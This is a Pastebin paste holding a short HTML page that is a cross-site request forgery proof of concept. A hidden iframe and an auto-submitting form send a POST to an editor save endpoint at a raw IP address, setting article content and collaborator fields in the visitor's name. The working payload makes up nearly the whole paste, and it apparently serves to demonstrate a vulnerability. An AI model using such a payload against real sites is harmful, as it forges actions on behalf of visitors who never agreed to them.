Advertisement
Guest User

Untitled

a guest
Apr 28th, 2017
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.68 KB | None | 0 0
  1.  
  2. <!DOCTYPE html>
  3. <html>
  4. <head>
  5. <title></title>
  6. </head>
  7. <body>
  8.  
  9.  
  10. <iframe style="display:none" name="csrf-frame"></iframe>
  11. <form method='POST' action='https://188.226.142.113/Editor/save' target="csrf-frame" id="csrf-form">
  12. <input type='hidden' name='articleName' value='example'>
  13. <input type='hidden' name='collaboratorReadOnly' value=''>
  14. <input type='hidden' name='collaboratorWrite' value=''>
  15. <input type='hidden' name='articleDescription' value='example'>
  16. <input type='hidden' name='articleContent' value='This is a documented attack.'>
  17. <input type='submit' value='submit'>
  18. </form>
  19. <script>document.getElementById("csrf-form").submit()</script>
  20.  
  21. </body>
  22. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement